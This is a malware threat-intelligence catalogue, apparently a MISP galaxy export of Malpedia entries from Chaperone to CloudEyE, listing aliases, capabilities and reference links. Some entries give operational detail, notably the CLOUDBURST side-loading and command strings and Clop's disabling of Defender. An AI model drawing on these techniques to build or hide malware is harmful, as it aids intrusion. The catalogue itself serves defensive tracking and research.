https://blog.qualys.com/vulnerabilities-threat-research/2022/01/17/the-chaos-ransomware-can-be-ravaging

Chaperone

According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim’s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.

The tag is: misp-galaxy:malpedia="Chaperone"

Chaperone is also known as:

  • Taj Mahal

Table 3136. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chaperone

https://securelist.com/apt-trends-report-q2-2019/91897/

https://github.com/TheEnergyStory/malware_analysis/tree/master/TajMahal

https://securelist.com/project-tajmahal/90240/

CHCH

CHCH is a Ransomware spotted in the wild in December 2019. It encrypts victim files and adds the extension .chch to them while it drops a ransomware note named: READ_ME.TXT

The tag is: misp-galaxy:malpedia="CHCH"

CHCH is also known as:

Table 3138. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chch

https://twitter.com/GrujaRS/status/1205566219971125249

CHEESETRAY

CHEESETRAY is a sophisticated proxy-aware backdoor that can operate in both active and passive mode depending on the passed command-line parameters. The backdoor is capable of enumerating files and processes, enumerating drivers, enumerating remote desktop sessions, uploading and downloading files, creating and terminating processes, deleting files, creating a reverse shell, acting as a proxy server, and hijacking processes among its other functionality. The backdoor communicates with its C&C server using a custom binary protocol over TCP with port specified as a command-line parameter.

The tag is: misp-galaxy:malpedia="CHEESETRAY"

CHEESETRAY is also known as:

  • CROWDEDFLOUNDER

Table 3140. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cheesetray

https://www.us-cert.gov/ncas/analysis-reports/ar20-045c

https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf

https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/

Chernolocker

Chernolocker is a ransomware that encrypts a victim’s files by using AES-256 and it asks for BTC ransom. Different versions are classified by the attacker’s email address which changes over time.

The tag is: misp-galaxy:malpedia="Chernolocker"

Chernolocker is also known as:

Table 3141. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chernolocker

https://id-ransomware.blogspot.com/2019/12/chernolocker-ransomware.html

ChewBacca

The tag is: misp-galaxy:malpedia="ChewBacca"

ChewBacca is also known as:

Table 3143. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chewbacca

http://vinsula.com/2014/03/01/chewbacca-tor-based-pos-malware/

Chimera

According to PCrisk, Chimera is a ransomware virus that encrypts files stored on infected systems. It is distributed using various false job applications, business offers, and infected email attachments. After encrypting the files, Chimera adds a . crypt extension to each file.

The tag is: misp-galaxy:malpedia="Chimera"

Chimera is also known as:

Table 3144. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chimera

https://www.malwarebytes.com/blog/news/2015/12/inside-chimera-ransomware-the-first-doxingware-in-wild

CHINACHOPPER

a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.

The tag is: misp-galaxy:malpedia="CHINACHOPPER"

CHINACHOPPER is also known as:

Table 3145. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper

https://www.crowdstrike.com/blog/an-end-to-smash-and-grab-more-targeted-approaches/

https://www.picussecurity.com/resource/blog/ttps-hafnium-microsoft-exchange-servers

https://www.youtube.com/watch?v=rn-6t7OygGk

https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos

https://attack.mitre.org/groups/G0096

https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf

https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders

https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/multi-factor-authentication-new-attacks

https://unit42.paloaltonetworks.com/remediation-steps-for-the-Microsoft-Exchange-Server-vulnerabilities/

https://www.secureworks.com/research/threat-profiles/bronze-president

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection

https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html

https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran

https://twitter.com/CyberRaiju/status/1373582619707867136

https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf

https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/

https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/

https://www.secureworks.com/research/threat-profiles/bronze-mohawk

https://twitter.com/ESETresearch/status/1366862946488451088

https://www.praetorian.com/blog/reproducing-proxylogon-exploit/

https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html

https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/

https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage

https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a

https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

https://www.secureworks.com/research/threat-profiles/bronze-atlas

https://www.secureworks.com/research/threat-profiles/bronze-express

https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers

https://techcommunity.microsoft.com/t5/azure-sentinel/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968

https://unit42.paloaltonetworks.com/microsoft-exchange-server-attack-timeline/

https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

https://attack.mitre.org/groups/G0125/

https://redcanary.com/blog/microsoft-exchange-attacks

https://secjoes-reports.s3.eu-central-1.amazonaws.com/Backdoor%2Bvia%2BXFF%2BMysterious%2BThreat%2BActor%2BUnder%2BRadar.pdf

https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers

https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/

https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/

https://blog.joshlemon.com.au/hafnium-exchange-attacks/

https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html

https://www.wired.com/story/china-microsoft-exchange-server-hack-victims/

https://us-cert.cisa.gov/ncas/alerts/aa20-275a

https://www.trendmicro.com/en_us/research/21/d/could-the-microsoft-exchange-breach-be-stopped.html

https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html

https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf

https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer—​a-ransomware—​and-a-botnet-join-the-part.html

https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/

https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers

https://unit42.paloaltonetworks.com/atoms/iron-taurus/

https://www.secureworks.com/research/threat-profiles/bronze-union

https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728

https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html

https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers

https://www.huntress.com/hubfs/Mass%20Exploitation%20of%20Microsoft%20Exchange%20(2).pdf

https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html

https://asec.ahnlab.com/en/47455/

https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits

https://www.domaintools.com/content/conceptualizing-a-continuum-of-cyber-threat-attribution.pdf

https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/

https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html

https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion

https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/

https://us-cert.cisa.gov/ncas/alerts/aa20-259a

https://unit42.paloaltonetworks.com/china-chopper-webshell/

https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html

https://attack.mitre.org/software/S0020/

https://www.huntress.com/hubfs/Videos/Webinars/Overlay-Mass_Exploitation_of_Exchange.mp4

https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/

https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf

Chinad

Adware that shows advertisements using plugin techniques for popular browsers

The tag is: misp-galaxy:malpedia="Chinad"

Chinad is also known as:

Table 3146. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad

https://www.malwarebytes.com/blog/news/2015/05/unusual-exploit-kit-targets-chinese-users-part-1

https://www.malwarebytes.com/blog/news/2015/06/unusual-exploit-kit-targets-chinese-users-part-2

ChinaJm

Ransomware.

The tag is: misp-galaxy:malpedia="ChinaJm"

ChinaJm is also known as:

Table 3147. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chinajm

https://id-ransomware.blogspot.com/2020/02/chinajm-ransomware.html

Chir

The tag is: misp-galaxy:malpedia="Chir"

Chir is also known as:

Table 3150. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chir

Chisel (Windows)

Chisel is an open-source project by Jaime Pillora (jpillora) that allows tunneling TCP and UDP connections via HTTP. It is available across platforms and written in Go. While benign in itself, Chisel has been utilized by multiple threat actors. It was for example observed by SentinelOne during a PYSA ransomware campaign to achieve persistence and used as backdoor. Github: https://github.com/jpillora/chisel

The tag is: misp-galaxy:malpedia="Chisel (Windows)"

Chisel (Windows) is also known as:

Table 3151. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chisel

https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/

https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/

Choziosi (Windows)

Choziosi is a browser hijacker for Chrome. It was first seen in January 2022. It commonly infects users via pirated media downloads like games, software, wallpapers or movies. The initial infectors are available for several platforms such as Mac and Windows.

Its main component is the Chrome browser extension written in JavaScript with the purpose of serving advertisments and hijacking search requests to Google, Yahoo and Bing.

The tag is: misp-galaxy:malpedia="Choziosi (Windows)"

Choziosi (Windows) is also known as:

  • ChromeLoader

Table 3153. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.choziosi

https://blogs.blackberry.com/en/2022/11/chromeloader-infects-the-browser-by-loading-malicious-extension

https://www.gdatasoftware.com/blog/2022/01/37236-qr-codes-on-twitter-deliver-malicious-chrome-extension

https://blogs.vmware.com/security/2022/09/the-evolution-of-the-chromeloader-malware.html

https://cybergeeks.tech/chromeloader-browser-hijacker

https://www.connectwise.com/blog/threat-report/smash-jacker

https://redcanary.com/blog/chromeloader/

https://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER

cifty

The tag is: misp-galaxy:malpedia="cifty"

cifty is also known as:

Table 3155. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cifty

http://contagiodump.blogspot.com/2009/06/win32updateexe-md5-eec80fd4c7fc5cf5522f.html

Clambling

Clambling was discovered by Trend Micro and TalentJump. It is a custom malware used by an actor they refer to as DRBControl, which targets gambling and betting companies in Southeast Asia. One version of Clambling uses Dropbox as C&C channel to hide its communication.

The tag is: misp-galaxy:malpedia="Clambling"

Clambling is also known as:

Table 3159. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.clambling

https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf

https://shared-public-reports.s3-eu-west-1.amazonaws.com/APT27+turns+to+ransomware.pdf

https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/

CLASSFON

The tag is: misp-galaxy:malpedia="CLASSFON"

CLASSFON is also known as:

Table 3160. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.classfon

https://content.fireeye.com/apt-41/rpt-apt41/

CLEANTOAD

CLEANTOAD is a disruption tool that will delete file system artifacts, including those related to BLINDTOAD, and will run after a date obtained from a configuration file. The malware injects shellcode into notepad.exe and it overwrites and deletes files, modifies registry keys, deletes services, and clears Windows event logs.

The tag is: misp-galaxy:malpedia="CLEANTOAD"

CLEANTOAD is also known as:

Table 3161. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cleantoad

https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf

ClipBanker

The ClipBanker Trojan is known as an information stealer and spy trojan, it aims to steal and record any type of sensitive information from the infected environment such as browser history, cookies, Outlook data, Skype, Telegram, or cryptocurrency wallet account addresses. The main goal of this threat is to steal confidential information. The ClipBanker uses PowerShell commands for executing malicious activities. The thing that made the ClipBanker unique is its ability to record various banking actions of the user and manipulate them for its own benefit. The distribution method of the ClipBanker is through phishing emails or through social media posts that lure users to download malicious content.

The tag is: misp-galaxy:malpedia="ClipBanker"

ClipBanker is also known as:

Table 3163. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.clipbanker

https://asec.ahnlab.com/en/35981/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/covid-19-phishing-lure-to-steal-and-mine-cryptocurrency/

https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf

Clipog

A keylogger.

The tag is: misp-galaxy:malpedia="Clipog"

Clipog is also known as:

Table 3164. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.clipog

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government

Clop (Windows)

Clop is a ransomware which uses the .clop extension after having encrypted the victim’s files. Another unique characteristic belonging with Clop is in the string: "Dont Worry C|0P" included into the ransom notes. It is a variant of CryptoMix ransomware, but it additionally attempts to disable Windows Defender and to remove the Microsoft Security Essentials in order to avoid user space detection.

The tag is: misp-galaxy:malpedia="Clop (Windows)"

Clop (Windows) is also known as:

Table 3165. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.clop

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://fourcore.io/blogs/clop-ransomware-history-adversary-simulation

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities

https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/

http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://www.bleepingcomputer.com/news/security/indiabulls-group-hit-by-clop-ransomware-gets-24h-leak-deadline/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://twitter.com/darb0ng/status/1338692764121251840

https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do

https://unit42.paloaltonetworks.com/clop-ransomware/

https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-clop

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Clop.md

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e

https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/

https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824

https://asec.ahnlab.com/en/19542/

https://www.zdnet.com/article/croatias-largest-petrol-station-chain-impacted-by-cyber-attack/

https://actu.fr/normandie/rouen_76540/une-rancon-apres-cyberattaque-chu-rouen-ce-reclament-pirates_29475649.html

https://www.boho.or.kr/filedownload.do?attach_file_seq=2808&attach_file_id=EpF2808.pdf

https://www.binance.com/en/blog/421499824684902240/Binance-Helps-Take-Down-Cybercriminal-Ring-Laundering-%24500M-in-Ransomware-Attacks

https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-c26daec604da4db6b3c93e26e6c7aa26

https://therecord.media/ukrainian-police-arrest-clop-ransomware-members-seize-server-infrastructure/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/clop-ransomware/

https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf

https://www.bleepingcomputer.com/news/security/ransomware-gang-urges-victims-customers-to-demand-a-ransom-payment/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://medium.com/s2wlab/operation-synctrek-e5013df8d167

https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://www.bleepingcomputer.com/news/security/cryptomix-clop-ransomware-says-its-targeting-networks-not-computers/

https://www.bleepingcomputer.com/news/security/ta505-hackers-behind-maastricht-university-ransomware-attack/

https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics

https://www.bleepingcomputer.com/news/security/microsoft-links-raspberry-robin-worm-to-clop-ransomware-attacks/

https://krebsonsecurity.com/2021/06/ukrainian-police-nab-six-tied-to-clop-ransomware/

https://medium.com/@Sebdraven/unpacking-clop-416b83718e0f

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

https://www.splunk.com/en_us/blog/security/detecting-clop-ransomware.html

https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546

https://securelist.com/modern-ransomware-groups-ttps/106824/

https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/

https://www.zdnet.com/article/german-tech-giant-software-ag-down-after-ransomware-attack/

https://github.com/albertzsigovits/malware-notes/blob/master/Clop.md

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://asec.ahnlab.com/wp-content/uploads/2021/01/Analysis_ReportCLOP_Ransomware.pdf

https://www.splunk.com/en_us/blog/security/clop-ransomware-detection-threat-research-release-april-2021.html

https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/

https://research.loginsoft.com/threat-research/taming-the-storm-understanding-and-mitigating-the-consequences-of-cve-2023-27350/

https://github.com/Tera0017/TAFOF-Unpacker

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/

https://www.secureworks.com/research/threat-profiles/gold-tahoe

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://www.youtube.com/watch?v=PqGaZgepNTE

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104

https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://www.carbonblack.com/blog/cb-tau-threat-intelligence-notification-cryptomix-clop-ransomware-disables-startup-repair-removes-edits-shadow-volume-copies/

https://www.bleepingcomputer.com/news/security/ransomware-gang-says-they-stole-2-million-credit-cards-from-e-land/

https://www.bleepingcomputer.com/news/security/clop-ransomware-gang-is-back-hits-21-victims-in-a-single-month/

https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot

https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?blob=publicationFile&v=2

https://www.cert.ssi.gouv.fr/cti/CERTFR-2019-CTI-009/

https://www.vice.com/en/article/wx5eyx/meet-the-ransomware-gang-behind-one-of-the-biggest-supply-chain-hacks-ever

https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/

CLOUDBURST

CLOUDBURST aka NickelLoader is an HTTP(S) downloader.

It recognizes a set of four basic commands, all five letters long, like abcde, avdrq, gabnc and dcrqv (alternatively: eknag, eacec, hjmwk, wohnp). The most important functionality is to load a received buffer, either as a DLL via the MemoryModule implementation, or as a shellcode.

It uses AES for encryption and decryption of network traffic. It usually sends the following information back to its C&C server: computer name, product name and the list of running processes. Typically, it uses two hardcoded parameter names for its initial HTTP POST requests: gametype and type (alternatively: type and code).

The CLOUDBURST payload is disguised as mscoree.dll and is side-loaded via a legitimate Windows binary PresentationHost.exe with the argument -embeddingObject. It comes either as a trojanized plugin project for Notepad++ (usually FingerText by erinata), or as a standalone DLL loaded by a dropper, which is a trojanized plugin project as well (usually NppyPlugin by Jari Pennanen).

The CLOUDBURST malware was used in Operation DreamJob attacks against an aerospace company and a network running Microsoft Intune software in Q2-Q3 2022.

The tag is: misp-galaxy:malpedia="CLOUDBURST"

CLOUDBURST is also known as:

  • NickelLoader

Table 3166. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudburst

https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970

https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/

CloudEyE

CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.

The tag is: misp-galaxy:malpedia="CloudEyE"

CloudEyE is also known as:

  • GuLoader

  • vbdropper

Table 3167. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

https://www.fortinet.com/blog/threat-research/spoofed-saudi-purchase-order-drops-guloader-part-two

https://inquest.net/blog/2022/08/29/office-files-rtf-files-shellcode-and-more-shenanigans

https://research.checkpoint.com/2020/guloader-cloudeye/

https://research.checkpoint.com/2023/unveiling-the-shadows-the-dark-alliance-between-guloader-and-remcos/

https://www.spamhaus.com/resource-center/dissecting-the-new-shellcode-based-variant-of-guloader-cloudeye/

https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943

https://twitter.com/VK_Intel/status/1252678206852907011

http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa

https://www.youtube.com/watch?v=gk7fCC5RiAQ

https://www.joesecurity.org/blog/3535317197858305930

https://www.vmray.com/cyber-security-blog/guloader-evasion-techniques-threat-bulletin/

https://www.youtube.com/watch?v=K3Yxu_9OUxU

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://www.youtube.com/watch?v=-FxyzuRv6Wg

https://twitter.com/TheEnergyStory/status/1240608893610459138

https://twitter.com/VK_Intel/status/1257206565146370050

https://www.crowdstrike.com/blog/guloader-malware-analysis/

https://www.intrinsec.com/wp-content/uploads/2023/09/TLP-CLEAR-20230912-EN-GuLoader-Information-report.pdf

https://cert-agid.gov.it/news/malware/tecniche-per-semplificare-lanalisi-del-malware-guloader/

https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter

https://twitter.com/TheEnergyStory/status/1239110192060608513

https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/playing-with-guloader-anti-vm-techniques-malware/

https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors

https://www.youtube.com/watch?v=N0wAh26wShE

https://research.checkpoint.com/2023/cloud-based-malware-delivery-the-evolution-of-guloader/

https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf

https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/

https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update

https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/

https://twitter.com/sysopfb/status/1258809373159305216

https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/

https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/

https://hidocohen.medium.com/guloaders-anti-analysis-techniques-e0d4b8437195

https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4

https://www.proofpoint.com/us/threat-insight/post/guloader-popular-new-vb6-downloader-abuses-cloud-services

https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-guloader

https://medium.com/@ZainWare/analyzing-guloader-42c1d6a73dfa

https://www.elastic.co/security-labs/getting-gooey-with-guloader-downloader

https://malwation.com/malware-config-extraction-diaries-1-guloader/

https://blog.morphisec.com/guloader-the-rat-downloader

https://clickallthethings.wordpress.com/2021/03/06/oleobject1-bin-ole10native-shellcode/

https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/

https://twitter.com/VK_Intel/status/1255537954304524288

https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland

https://malwarebookreports.com/guloader-navigating-a-maze-of-intricacy/

https://kienmanowar.wordpress.com/2020/06/27/quick-analysis-note-about-guloader-or-cloudeye/

https://research.checkpoint.com/2020/threat-actors-migrating-to-the-cloud/

https://www.crowdstrike.com/blog/guloader-dissection-reveals-new-anti-analysis-techniques-and-code-injection-redundancy/

https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html

https://cert.pl/en/posts/2021/04/keeping-an-eye-on-guloader-reverse-engineering-the-loader/

https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/

https://gi7w0rm.medium.com/cloudeye-from-lnk-to-shellcode-4b5f1d6d877

https://malpedia.caad.fkie.fraunhofer.de/details/win.guloader

https://experience.mandiant.com/trending-evil-2/p/1

https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728

https://labs.k7computing.com/?p=20156

https://labs.vipre.com/unloading-the-guloader/

https://asec.ahnlab.com/en/55978/

